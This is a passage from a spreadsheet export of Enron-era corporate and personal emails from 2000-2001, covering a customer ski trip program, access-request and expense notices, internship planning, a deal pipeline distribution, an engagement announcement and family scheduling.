Beth Perlman/HOU/ECT@ECT, Kevin M Presto/HOU/ECT@ECT, Brian _x000D_
Redmond/HOU/ECT@ECT, Hunter S Shively/HOU/ECT@ECT, James D _x000D_
Steffes/NA/Enron@Enron, Fletcher J Sturm/HOU/ECT@ECT, Bruce _x000D_
Sukaly/Corp/Enron@Enron, Mike Swerzbin/HOU/ECT@ECT, Scott _x000D_
Tholan/Corp/Enron@Enron, Barry Tycholiz/CAL/ECT@ECT, Frank W _x000D_
Vickers/HOU/ECT@ECT, Greg Wolfe/HOU/ECT@ECT, Max Yzaguirre/NA/Enron@ENRON, _x000D_
John Zufferli/CAL/ECT@ECT, Deirdre McCaffrey/HOU/ECT@ECT, Jennifer _x000D_
Shipos/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: 2001 ENA/EGM/EIM CUSTOMER SKI PROGRAM_x000D_
_x000D_
Winter is just around the corner and the new ski season will be opening _x000D_
soon.  Please review the proposed information below, regarding the _x000D_
ENA/EGM/EIM Customer Ski Program, to help us determine what our needs will be _x000D_
for the 2001 season._x000D_
_x000D_
Location:  Beaver Creek, Colorado_x000D_
Preliminary Dates:  February 21 - March 14, 2001_x000D_
Approximate Cost Per Person:  $2,600 (based on 82 participants)_x000D_
_x000D_
The preliminary dates have been divided into 6 trips:_x000D_
TRIP	DATES	TOTAL # OF BEDS_x000D_
Trip 1	Wed, February 21 - Sat, February 24	11_x000D_
Trip 2	Sun, February 25 - Wed, February 28	17_x000D_
Trip 3	Wed, February 28 - Sat, March 3	13_x000D_
Trip 4	Sun, March 4 - Wed, March 7	13_x000D_
Trip 5	Wed, March 7 - Sat, March 10	13_x000D_
Trip 6	Sun, March 11 - Wed, March 14	15_x000D_
_x000D_
The program cost per person includes:_x000D_
? Four days/three nights accommodations in luxurious private homes in the _x000D_
premier Holden Road/Borders Road area of Beaver  Creek with daily maid service_x000D_
? Animated invitation with on-line registration_x000D_
? Round-trip airport ground transportation_x000D_
? Experienced property hosts_x000D_
? Daily lift tickets and ski instruction_x000D_
? Ski equipment rental_x000D_
? Catered dinner two nights_x000D_
? Catered breakfast daily_x000D_
? Off-site dinner coordination_x000D_
? Alternate activity coordination_x000D_
? Private vans at each house_x000D_
? One massage with experienced in-house massage therapists_x000D_
? Enron promotional gift item_x000D_
? Pre-program administration and coordination_x000D_
? On-site operation_x000D_
_x000D_
If you are interested in participating in the 2001 ski program, please submit _x000D_
an email  request to me no later than Friday, December 8th, including the _x000D_
following information:_x000D_
Name_x000D_
Company_x000D_
Department_x000D_
Telephone_x000D_
Fax_x000D_
Number of People_x000D_
Choice of Dates (1st, 2nd &amp; 3rd)_x000D_
Company #_x000D_
RC #_x000D_
_x000D_
The week of December 11th, all requests will be compiled for review and final _x000D_
approval._x000D_
_x000D_
Questions should be directed to my attention at (713) 853-6978.  _x000D_
</t>
  </si>
  <si>
    <t>Fri, 23 Nov 2001 17:35:18 -0800 (PST)</t>
  </si>
  <si>
    <t>Approval is Overdue: Access Request for_x000D_
 shannon.groenewold@enron.com</t>
  </si>
  <si>
    <t xml:space="preserve">This request has been pending approval for  3 days and you are the alternate.  Please click http://itcapps.corp.enron.com/srrs/auth/emailLink.asp?ID=000000000077033&amp;Page=Approval to review and act upon this request._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Request ID          : 000000000077033_x000D_
Approver            : patti.sullivan@enron.com_x000D_
Request Create Date : 11/21/01 12:01:34 PM_x000D_
Requested For       : shannon.groenewold@enron.com_x000D_
Resource Name       : VPN/IPASS_x000D_
Resource Type       : Applications_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>frozenset({'susan.scott@enron.com', 'christine.stokes@enron.com', 'lee.huber@enron.com', 'tk.lohman@enron.com', 'lorraine.lindberg@enron.com', 'kevin.hyatt@enron.com', 'jeffery.fawcett@enron.com', 'michelle.lokay@enron.com', 'steven.harris@enron.com', 'lindy.donoho@enron.com'})</t>
  </si>
  <si>
    <t>_x000D_
Edison Mission Energy to build power plant in California_x000D_
_x000D_
Edison Mission Energy, an Edison International company, is purchasing the_x000D_
rights to the Sunrise Power Project from Texaco Power and Gasification. A_x000D_
proposed power generation facility to be located in Kern County, Calif., the_x000D_
project will bring both short- and long-term generation capacity to the_x000D_
state, which is in dire need of new power generation._x000D_
_x000D_
The Sunrise Power Project will be completed in two phases. Phase 1 will_x000D_
consist of a 320-MW, simple-cycle peaking facility scheduled to be in_x000D_
service during the summer of 2001. Phase 2 will convert the peaking facility_x000D_
to a 560-MW, combined-cycle operation with an in-service date of summer_x000D_
2003._x000D_
_x000D_
Final regulatory approvals should be received shortly for Phase I of the_x000D_
project. Edison Mission Energy plans to seek expedited permitting approval_x000D_
for the Phase II expansion in line with the fast-track approvals process_x000D_
recently enacted by the California legislature._x000D_
_x000D_
Edison Mission Energy specializes in the development, acquisition,_x000D_
construction management and operation of global power production facilities._x000D_
The company owns nearly 23,000 MW of generating capacity, including_x000D_
interests in 75 projects currently under construction or operating in_x000D_
Australia, Indonesia, Italy, New Zealand, Puerto Rico, Spain, Thailand,_x000D_
Turkey, the United Kingdom and the United States.</t>
  </si>
  <si>
    <t>Thu, 17 Feb 2000 02:17:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Summer Internship Position</t>
  </si>
  <si>
    <t xml:space="preserve">Ravi,_x000D_
_x000D_
Charlene wants the entire batch of potential summer intern resumes sent to _x000D_
her in one step._x000D_
I want to complete this by Friday. Catch me after lunch to talk about it._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Ravi Thuraisingham@ENRON COMMUNICATIONS on 02/17/2000 10:11:36 AM_x000D_
To: Vince Kaminski_x000D_
cc: April Hodgson/Enron Communications@Enron Communications, Matt _x000D_
Harris/Enron Communications@Enron Communications, Stinson Gibner/HOU/ECT@ECT, _x000D_
Charlene Jackson@ENRON, Celeste Roberts/HOU/ECT@ECT _x000D_
Subject: Re: Summer Internship Position_x000D_
_x000D_
Hi Vince, Paulo Oleira (one of the M.I.T attending our meeting on wed)'s _x000D_
research interest turned out to be a match for April Hodgeson (VP of content _x000D_
origination). I had him talk to April (Stinson was on the call as well) to _x000D_
discuss his research interest and what he would likely to do for April.  I _x000D_
suggested (and April agrees) that Paulo would intern with her and Matt and _x000D_
perform research on how end users (consumers and business) improved _x000D_
experience with ePowered content can be quantified.  This may include _x000D_
performing control experiments at M.I.T.  We decided not to over specify what _x000D_
he would do since it is likely to change as soon as he arrives.  I suggested _x000D_
once he starts, he will work with April and Matt Harris (VP enterprise _x000D_
origination) and they will define what the student needs to complete for the _x000D_
internship.  _x000D_
_x000D_
Addiontionally, Tom Gros agrees that this type of research are needed and _x000D_
this is a great way to start._x000D_
_x000D_
I will proceed to have recruiting contact the student with an offer to start _x000D_
around May 22, 2000 unless someone tells me otherwise._x000D_
_x000D_
Regards,_x000D_
_x000D_
Ravi._x000D_
_x000D_
P.S. Charlene, please include Paulo in your May 22, 2000 start group.  Paulo _x000D_
will report to me within EBS research group but will work on a day-to-day _x000D_
basis with April and Matt. As you've mentioned that compensation is somewhat _x000D_
fixed but please keep in mind that this person is a PhD candidate with very _x000D_
specialized skill set. Please contact Vince before extending an offer that _x000D_
may be too low, etc.  _x000D_
_x000D_
_x000D_
----- Forwarded by Ravi Thuraisingham/Enron Communications on 02/17/00 09:27 _x000D_
AM -----_x000D_
_x000D_
	Charlene Jackson@ENRON_x000D_
	02/17/00 08:25 AM_x000D_
		_x000D_
		 To: Vince J Kaminski/HOU/ECT@ECT_x000D_
		 cc: Celeste Roberts/HOU/ECT@ECT, Vince J Kaminski/HOU/ECT@ECT, Ravi _x000D_
Thuraisingham/Enron Communications@Enron Communications@ECT_x000D_
		 Subject: Re: Summer Internship Position_x000D_
_x000D_
Celeste,_x000D_
_x000D_
We need to make sure that the interns in Vince's group are coordinated and _x000D_
incorporated with the rest of the summer associates.  They should be offered _x000D_
the same starting dates, I believe they are May 22, 2000 June 5, 2000.  I am _x000D_
not sure about the June date.  Would you check and let Vince know.  They _x000D_
should also be offered the same starting salary package as the others.  They _x000D_
will be included in training (a few days) and any other events we host._x000D_
Thanks_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 4 Jun 2001 09:21:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'stephen.evans@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'wes.colwell@enron.com', 'mark.evans@enron.com', 'riccardo.bortolotti@enron.com', 'james.new@enron.com', 'anne.edgley@enron.com', 'markus.fiala@enron.com', 'joe.gold@enron.com', 'stephen.wood@enron.com', 'michael.brown@enron.com', 'christopher.mckey@enron.com', 'david.wall@enron.com', 'paul.quilkey@enron.com', 'fernley.dyson@enron.com', 'lloyd.wantschek@enron.com', 'maria.foster@enron.com', 'tani.nath@enron.com', 'coralie.evans@enron.com', 'michael.farmer@enron.com', 'matthew.landy@enron.com', 'thorstein.jenssen@enron.com', 'kevin.heffron@enron.com', 'claire.wright@enron.com', 'janine.juggins@enron.com', 'orjan.agdesteen@enron.com', 'melissa.allen@enron.com', 'john.bottomley@enron.com', 'steve.dwyer@enron.com', 'paul.chivers@enron.com', 'mark.frevert@enron.com', 'tom.mckeever@enron.com', 'gregor.baumerich@enron.com', 'james.crowson@enron.com', 'paul.freeman@enron.com', "niamh.o'regan@enron.com", 'faith.killen@enron.com', 'joseph.hirl@enron.com', 'robert.bayley@enron.com', 'mike.wellings@enron.com', 'mike.jordan@enron.com', 'rob.yeo@enron.com', 'michael.hutchinson@enron.com', 'andrew.cornfield@enron.com', 'nigel.friend@enron.com', 'heidi.mason@enron.com', 'ted.ii@enron.com', 'jan-erland.bekeng@enron.com', 'michael.patrick@enron.com', 'john.chappell@enron.com', 'nigel.grace@enron.com', 'erica.gut@enron.com', 'recipients@enron.com', 'simon.turner@enron.com', 'ingrid.morse@enron.com', 'peter.crilly@enron.com', 'paul.mead@enron.com', 'jarek.astramowicz@enron.com', 'mark.pickering@enron.com', 'steven.los@enron.com', 'eric.shaw@enron.com', 'thor.lien@enron.com', 'greg.whalley@enron.com', "paul.d'arcy@enron.com"})</t>
  </si>
  <si>
    <t>Deal Pipeline</t>
  </si>
  <si>
    <t>Please find attached the updated Deal Pipeline. Please recognise that this is _x000D_
confidential information and that this document should not be forwarded._x000D_
_x000D_
_x000D_
_x000D_
If you wish other team members to receive this document, please send a _x000D_
request by email._x000D_
_x000D_
Please call Buddy Aiken or myself with any questions or comments._x000D_
_x000D_
Thanks_x000D_
_x000D_
Stephen_x000D_
Ext 37704_x000D_
_x000D_
_x000D_
_x000D_
Please note the pipeline is also distributed to; _x000D_
Olivier Herbelot/LON/ECT, Tim Davies/LON/ECT, Rod Nelson/LON/ECT, Diana _x000D_
Higgins/LON/ECT, Karolina Moran/LON/ECT, Claire Wright/LON/ECT, Rick _x000D_
Bergsieker/ENRON_DEVELOPMENT, Liisa Mulbrecht/LON/ECT, Naomi Connell/LON/ECT, _x000D_
Tim Poullain-Patterson/LON/ECT, Anastasia Karabatsos/LON/ECT, Viacheslav _x000D_
Danilov/LON/ECT, David Minns/ENRON_DEVELOPMENT, Steve Whitaker/LON/ECT, _x000D_
Manjeet Jones/EU/Enron, Anthony Key/LON/ECT, Suzanne Lane/LON/ECT, Martin _x000D_
Ley/LON/ECT, Richard Smith/LON/ECT, Christopher Hall/LON/ECT, Greg _x000D_
McMahon/LON/ECT, Jon Durman/LON/ECT, Nik Simon/LON/ECT, Thomas Rice/LON/ECT, _x000D_
Damien Campbell/EU/Enron, Silvia Sousa/LON/ECT, Anthony Shillingford/LON/ECT, _x000D_
Rich Hiersche/EU/Enron, Kevin D Jordan/Corp/Enron, Robert _x000D_
Fenton-Stone/LON/ECT, Morten E Pettersen/AP/Enron, Jeremy Thirsk/AP/Enron, _x000D_
Marcus Von Bock Und Polach/LON/ECT, Justin Boyd/LON/ECT, Jon Chapman/LON/ECT, _x000D_
Jane McBride/AP/Enron, Paul Simons/LON/ECT, Peter Hutton/EU/Enron, Limor _x000D_
Nissan/NYC/MGUSA, Thorstein Jenssen/OSL/ECT, Suzanne Ferlic/LON/ECT, Peter _x000D_
Styles/LON/ECT@ECT, Paul Hennemeyer/LON/ECT@ECT, Paul Dawson/Govt. _x000D_
Affairs/LON/ECT@ECT, Doug Wood/LON/ECT@ECT, Maria Nordgren/EU/Enron, Nina _x000D_
Edmonds/LON/ECT</t>
  </si>
  <si>
    <t>Wed, 13 Dec 2000 07:04:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mary.hain@enron.com', 'susan.mara@enron.com', 'jeff.dasovich@enron.com', 'james.steffes@enron.com', 'richard.sanders@enron.com', 'christi.nicolay@enron.com', 'pallen@enron.com', 'pkaufma@enron.com', 'rebecca.cantrell@enron.com', 'richard.shapiro@enron.com', 'joe.hartsoe@enron.com', 'stephanie.miller@enron.com', 'steven.kean@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Attached  are two files that illustrate the following:_x000D_
_x000D_
As prices rose, supply increased and demand decreased.  Now prices are _x000D_
beginning to fall in response these market responses. _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 26 Nov 2001 08:07:29 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'i00nlp@fds.com'})</t>
  </si>
  <si>
    <t>RE: Our tree trimming storey.....</t>
  </si>
  <si>
    <t xml:space="preserve">sounds great - we will definitely try to see you that weekend -- cinco ranch is actually public so that shouldnt be a problem -- willow fork is private but i think you can rent it and just pay more -- i went to a reception at the equestrian center once and that was really nice -- i know whatever you choose will be beautiful -- take care -- see you soon._x000D_
_x000D_
-----Original Message-----_x000D_
From: Nicole L Pritula [mailto:i00nlp@FDS.com]_x000D_
Sent: Monday, November 26, 2001 9:53 AM_x000D_
To: Kuykendall, Tori_x000D_
Subject: RE: Our tree trimming storey....._x000D_
_x000D_
_x000D_
_x000D_
Thanks!  We will be in town on December 8th.  We are going to try to visit_x000D_
some reception sites and see everybody.  I don't know exactly how, but we_x000D_
are going to try.  Diane can probably update you with more details as it_x000D_
gets closer._x000D_
_x000D_
I want to look at some places near Katy.  I am going to try to look at the_x000D_
Equestrian Center and maybe the Cinco Ranch Country Club (if it lets_x000D_
non-members use their facility).  I am going to try to have a all-in-one_x000D_
place.  Ceremony and Reception.  But I may have to find a church.  Who_x000D_
knows right now?_x000D_
_x000D_
Hopefully we will see you soon.  I want to see ERIN!!!  Tell Pat that I_x000D_
said "HI".    Nicole_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Kuykendall, Tori" &lt;Tori.Kuykendall@ENRON.com&gt; on 11/26/2001 10:39:40 AM_x000D_
_x000D_
To:   "Nicole L Pritula" &lt;i00nlp@FDS.com&gt;_x000D_
cc:_x000D_
_x000D_
Subject:  RE: Our tree trimming storey....._x000D_
_x000D_
_x000D_
CONGRATULATIONS!!!!    I'm all teary eyed!  I knew you picked a good_x000D_
one!!_x000D_
_x000D_
-----Original Message-----_x000D_
From: Nicole L Pritula [mailto:i00nlp@FDS.com]_x000D_
Sent: Monday, November 26, 2001 9:27 AM_x000D_
To: Kuykendall, Tori_x000D_
Subject: Our tree trimming storey....._x000D_
_x000D_
_x000D_
_x000D_
Bryan and I decided to start putting up the Christmas decorations this_x000D_
week.  Sunday, we got the tree out of the closet and set that up in the_x000D_
living room.  Our plan was to do a little bit every night.  By_x000D_
Thanksgiving, we would have a beautifully decorated house.  On Monday,_x000D_
Bryan put the lights on the tree.  Then I started unwrapping some of the_x000D_
ornaments.... just to look at them.  Well, after I unwrapped *all* of_x000D_
the_x000D_
ornaments, we decided to finish trimming the tree.  Bryan was hanging_x000D_
back_x000D_
and letting me do most of the decorating.  Though I did notice that one_x000D_
of_x000D_
the first ornaments that he put on the tree was my heart shaped Nicole_x000D_
ornament.  After we finished, we sat in the glow of the big bulb lights_x000D_
and_x000D_
admired our tree.  That was when Bryan informed me that I did not find_x000D_
my_x000D_
NEW ornament.  He had put something new on one of the trees.  (we have a_x000D_
charlie brown tree in the bedroom and the big tree in the living room.)_x000D_
I_x000D_
could not find anything new on the charlie brown tree so I moved to the_x000D_
big_x000D_
tree._x000D_
_x000D_
After surveying the big tree for a few moments, the little girl in me_x000D_
said,_x000D_
"Look for a ring, look for a ring".  But the practical side of me said,_x000D_
"Find the ornament".  Well, just about then I found a beautiful diamond_x000D_
ring hanging from the heart shaped Nicole ornament.  My engagement ring_x000D_
had_x000D_
been on the tree the entire time.  I was so focused on the decorating_x000D_
that_x000D_
I never saw it.  Bryan has since been teasing me that any other woman_x000D_
would_x000D_
have known right away that there was a diamond ring on the tree._x000D_
_x000D_
I am very happy and excited to tell everyone that Bryan and I are_x000D_
engaged_x000D_
to be married.  We do not have a date, time, place or even a ctiy yet._x000D_
I_x000D_
just couldn't wait to tell everyone.  I know that I will be wearing a_x000D_
big_x000D_
smile for a long, long time!_x000D_
_x000D_
Happy Holidays, Nicole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t>
  </si>
  <si>
    <t>Mon, 9 Apr 2001 12:21:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: deal 710837</t>
  </si>
  <si>
    <t xml:space="preserve">The 4429 is good._x000D_
D_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Michael Olsen@ENRON_x000D_
04/09/2001 09:09 AM_x000D_
To:	Daren J Farmer/HOU/ECT@ECT_x000D_
cc:	 _x000D_
Subject:	deal 710837_x000D_
_x000D_
This was a weekend deal with Mirant.  On your spreadsheet, the volume shows 4429.  This is also the volume that I confirmed with Mirant.  The deal is in Unify for 5429.  Could you please check and let me know which volume is good. _x000D_
_x000D_
Mike_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 4 Aug 2000 11:21:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'nicole.laporte@enron.com'})</t>
  </si>
  <si>
    <t>Re: OPT and C are offial</t>
  </si>
  <si>
    <t>Here you go._x000D_
_x000D_
Robin</t>
  </si>
  <si>
    <t>Tue, 24 Oct 2000 09:55:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Schedules to Purchase and Sale Agreement for Bidder A</t>
  </si>
  <si>
    <t xml:space="preserve">please print this and attachments.  Thanks.  MHC_x000D_
_x000D_
---------------------- Forwarded by Michelle Cash/HOU/ECT on 10/24/2000 04:55 _x000D_
PM ---------------------------_x000D_
From: Anne C Koehler on 10/24/2000 04:37 PM_x000D_
To: Rhett Jackson/HOU/ECT@ECT, Louis Soldano/ET&amp;S/Enron@ENRON, Michelle _x000D_
Cash/HOU/ECT@ECT, Jim Coffey/HOU/ECT@ECT, David Marshall/HOU/ECT@ECT_x000D_
cc: Barbara N Gray/HOU/ECT@ECT, Patrick Wade/HOU/ECT@ECT _x000D_
Subject: Schedules to Purchase and Sale Agreement for Bidder A_x000D_
_x000D_
Attached here are the current draft of the disclosure schedules to be _x000D_
attached to the Purchase and Sale Agreement with Bidder A.  I have also _x000D_
attached the portion of the PSA that contains the reps and warranties to _x000D_
which the schedules relate. Please review the following schedules against the _x000D_
reps and warranties to which they relate and let me know if any changes or _x000D_
updates need to be made.  _x000D_
_x000D_
Thanks._x000D_
_x000D_
Anne C. Koehler_x000D_
Sr. Counsel, ENA_x000D_
EB 3832_x000D_
713-853-3448_x000D_
</t>
  </si>
  <si>
    <t>Tue, 13 Feb 2001 08:45:00 -0800 (PST)</t>
  </si>
  <si>
    <t>i will take your word for it.</t>
  </si>
  <si>
    <t>Thu, 4 Jan 2001 16:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'andrea.yowman@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'cindy.olson@enron.com', 'steven.kean@enron.com'})</t>
  </si>
  <si>
    <t>Re: Follow-up on Performance Feedback Training</t>
  </si>
  <si>
    <t xml:space="preserve">  Here's the attachement noted below._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Andrea Yowman_x000D_
01/05/2001 12:17 AM_x000D_
To: Steven J Kean/NA/Enron@Enron, Cindy Olson/Corp/Enron@ENRON_x000D_
cc: Brian Schaffer/Corp/Enron@ENRON, Sharon Butcher/Corp/Enron@ENRON, _x000D_
Michelle Cash/HOU/ECT@ECT _x000D_
_x000D_
Subject: Follow-up on Performance Feedback Training_x000D_
_x000D_
Steve and Cindy, _x000D_
_x000D_
Brian, Sharon Michelle and I met today to discuss the strategy for _x000D_
Performance Feedback Training and decided on the following. _x000D_
The presentation should be updated to reflect the PRC process, relative _x000D_
ranking and preferred distribution. (attached)_x000D_
Brian Schaffer will complete the Houston training sessions next week._x000D_
The HR Community within the BU's need to be trained and armed with _x000D_
information to better address questions and concerns from Managers, _x000D_
Supervisors and employees on the process.  _x000D_
A "Mandatory" global HR  training/meeting should be held Tuesday January 16th _x000D_
and kicked off by Steve Kean and Cindy Olson.  Brian will prepare an invite _x000D_
communication.  (Probably at the Double Tree or Hyatt and other locations _x000D_
video / tele conference)_x000D_
An eSeak should be held week of  January 16th on Performance Management._x000D_
The HR Heads should send out a separate communication to their people to _x000D_
reinforce attendance to this meeting/training._x000D_
A separate communication should be sent out to 'employees' and 'Superviors _x000D_
below Manager'  on the PRC process.  Brian will prepare a draft of the _x000D_
communication._x000D_
_x000D_
Please give us your thoughts on this approach.  You can contact Brian, _x000D_
Michelle, Sharon or me if you have specific questions. _x000D_
ay_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 13 Aug 2000 17:06:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>A.Word.A.Day--dol</t>
  </si>
  <si>
    <t>dol (dol) noun_x000D_
_x000D_
   A unit for measuring the intensity of pain._x000D_
_x000D_
[From Latin dol(or) pain.]_x000D_
_x000D_
   "Minutes later it was still a comfortable four dol--what did they do, shut_x000D_
   off the steam? Finally I removed my hand and examined my fingers: great_x000D_
   blisters on thumb and finger."_x000D_
   Richard Kopperdahl, Bettervue hospital, Village Voice, Oct 3, 1995._x000D_
_x000D_
One doesn't have to know the unit of pain to realize that the unit of joy_x000D_
is not the dollar, or any other currency for that matter. We don't have to_x000D_
look far to discover that some of the richest people on this planet are_x000D_
not the most happy ones. Having lived in two not only geographic but also_x000D_
economically antipodal places, I've met persons who were blissful and those_x000D_
who were miserable, but their conditions were hardly a function of money._x000D_
Certainly it is good to have the means to pay for basic necessities, but_x000D_
after that it's only a series of zeros in some account._x000D_
_x000D_
English author Samuel Butler once said, "Words are like money; there is_x000D_
nothing so useless, unless when in actual use." We can't do much about_x000D_
circulating money (which I hope you have plenty of), but we do try our best_x000D_
to put words in actual use. This week it is those words that make one say,_x000D_
"I didn't know there was a word for that."                          -Anu_x000D_
_x000D_
............................................................................._x000D_
Every child is an artist. The problem is how to remain an artist once he_x000D_
grows up. -Pablo Picasso, painter and sculptor (1881-1973)_x000D_
_x000D_
Subscribe:    http://wordsmith.org/awad/subscribe.html_x000D_
Unsubscribe:    http://wordsmith.org/awad/unsubscribe.html_x000D_
Change address:   http://wordsmith.org/awad/address-change.html_x000D_
Gift subscription:  http://wordsmith.org/awad/gift.html_x000D_
_x000D_
Pronunciation:_x000D_
http://wordsmith.org/words/dol.wav_x000D_
http://wordsmith.org/words/dol.ram</t>
  </si>
  <si>
    <t>Tue, 17 Apr 2001 09:36:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Mason's birthday</t>
  </si>
  <si>
    <t xml:space="preserve">I had a vegetarian sandwich._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Neil Mann" &lt;nmann@erac.com&gt; on 04/17/2001 03:57:28 PM_x000D_
Please respond to &lt;nmann@erac.com&gt;_x000D_
To: &lt;Kay.Mann@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: RE: Mason's birthday_x000D_
_x000D_
Will do...I will ask tonight._x000D_
Our phones went out about an hour ago. That's good and bad..._x000D_
What did you have for lunch? I need to know because I have a plan..._x000D_
NM_x000D_
_x000D_
-----Original Message-----_x000D_
From: Kay.Mann@enron.com [mailto:Kay.Mann@enron.com]_x000D_
Sent: Tuesday, April 17, 2001 3:17 PM_x000D_
To: nmann@erac.com_x000D_
Subject: RE: Mason's birthday_x000D_
_x000D_
_x000D_
_x000D_
I don't know.  I hate to spring it on her.  Maybe suggest it for next week_x000D_
at the Houstonian._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Neil Mann" &lt;nmann@erac.com&gt; on 04/17/2001 02:05:45 PM_x000D_
_x000D_
Please respond to &lt;nmann@erac.com&gt;_x000D_
_x000D_
To:   &lt;Kay.Mann@enron.com&gt;_x000D_
cc:_x000D_
_x000D_
Subject:  RE: Mason's birthday_x000D_
_x000D_
What about the Charlotte idea?_x000D_
_x000D_
-----Original Message-----_x000D_
From: Kay.Mann@enron.com [mailto:Kay.Mann@enron.com]_x000D_
Sent: Tuesday, April 17, 2001 1:38 PM_x000D_
To: nmann@erac.com_x000D_
Subject: RE: Mason's birthday_x000D_
_x000D_
_x000D_
_x000D_
Old Katy Road._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Neil Mann" &lt;nmann@erac.com&gt; on 04/17/2001 01:35:58 PM_x000D_
_x000D_
Please respond to &lt;nmann@erac.com&gt;_x000D_
_x000D_
To:   &lt;Kay.Mann@enron.com&gt;_x000D_
cc:_x000D_
_x000D_
Subject:  RE: Mason's birthday_x000D_
_x000D_
I don't remember where this one is being held. If it's near StF I could_x000D_
probably drop him off and pick him up. Do you know the hours?_x000D_
Or, what do you think about me asking Charlotte to switch days? NM_x000D_
_x000D_
-----Original Message-----_x000D_
From: Kay.Mann@enron.com [mailto:Kay.Mann@enron.com]_x000D_
Sent: Tuesday, April 17, 2001 1:15 PM_x000D_
To: nmann@erac.com_x000D_
Subject: RE: Mason's birthday_x000D_
_x000D_
_x000D_
_x000D_
This is the rock gym party.  I bought presents for this and the Houstonian_x000D_
party, which is next Wednesday._x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Neil Mann" &lt;nmann@erac.com&gt; on 04/17/2001 01:14:52 PM_x000D_
_x000D_
Please respond to &lt;nmann@erac.com&gt;_x000D_
_x000D_
To:   &lt;Kay.Mann@enron.com&gt;_x000D_
cc:_x000D_
_x000D_
Subject:  RE: Mason's birthday_x000D_
_x000D_
Is this the one at the Houstonian? What are the hours? Maybe I could drop_x000D_
him off and come back to pick him up? NM_x000D_
_x000D_
-----Original Message-----_x000D_
From: Kay.Mann@enron.com [mailto:Kay.Mann@enron.com]_x000D_
Sent: Tuesday, April 17, 2001 11:21 AM_x000D_
To: nmann@erac.com_x000D_
Subject: Mason's birthday_x000D_
_x000D_
_x000D_
FYI._x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 04/17/2001 11:20_x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Kay Mann_x000D_
04/17/2001 11:20 AM_x000D_
_x000D_
To:   raisinghales@aol.com_x000D_
cc:_x000D_
_x000D_
Subject:  Mason's birthday_x000D_
_x000D_
Yikes!  I just realized that tomorrow is Mason's birthday party.  I know_x000D_
Michael would love to go.  Both my husband and I work, but I will attempt_x000D_
to take off and bring him.  Thanks for the invitation._x000D_
_x000D_
Kay Mann_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 8 May 2001 09:36:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'aparna.rajaram@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'nicole.hunter@enron.com', 'frank.davis@enron.com', 'steve.venturatos@enron.com', 'tana.jones@enron.com', 'bill.hare@enron.com', 'karen.lambert@enron.com', 'ken.curry@enron.com', 'fraisy.george@enron.com', 'lesli.campbell@enron.com', 'amber.ebow@enron.com', 'kelly.lombardi@enron.com', 'angela.brown@enron.com', 'tom.moran@enron.com', 'tanya.rohauer@enron.com', 'bernice.rodriguez@enron.com', 'samuel.schott@enron.com'})</t>
  </si>
  <si>
    <t>Click Paper Approvals, 05-08-2001</t>
  </si>
  <si>
    <t>Please see attached._x000D_
_x000D_
_x000D_
Aparna Rajaram_x000D_
Ph: (713) 345-4563_x000D_
Fax: (713) 853-9476_x000D_
Aparna.Rajaram@enron.com</t>
  </si>
  <si>
    <t>Wed, 3 May 2000 10:32:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>DYNEGY</t>
  </si>
  <si>
    <t>Do you have a phone number for Brenda McAfee at Dynegy?</t>
  </si>
  <si>
    <t>Tue, 29 May 2001 07:24:30 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'eserver@enron.com'})</t>
  </si>
  <si>
    <t>&lt;&lt;Concur Expense Document&gt;&gt; - Trip to Chicago</t>
  </si>
  <si>
    <t>The Payment status has changed on the following report:_x000D_
_x000D_
Status last changed by:  System_x000D_
Expense Report Name: Trip to Chicago_x000D_
Report Total: $671.56_x000D_
Amount Due Employee: $671.56_x000D_
Amount Approved: $671.56_x000D_
Amount Paid: $0.00_x000D_
Approval Status: Approved_x000D_
Payment Status: In Progress_x000D_
_x000D_
_x000D_
To review this expense report, click on the following link for Concur Expense._x000D_
http://xms.enron.com</t>
  </si>
  <si>
    <t>Tue, 12 Dec 2000 06:34:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Lacima Energy and Weather Derivatives Courses by Clewlow and_x000D_
 Strickland</t>
  </si>
  <si>
    <t xml:space="preserve">Julie,_x000D_
_x000D_
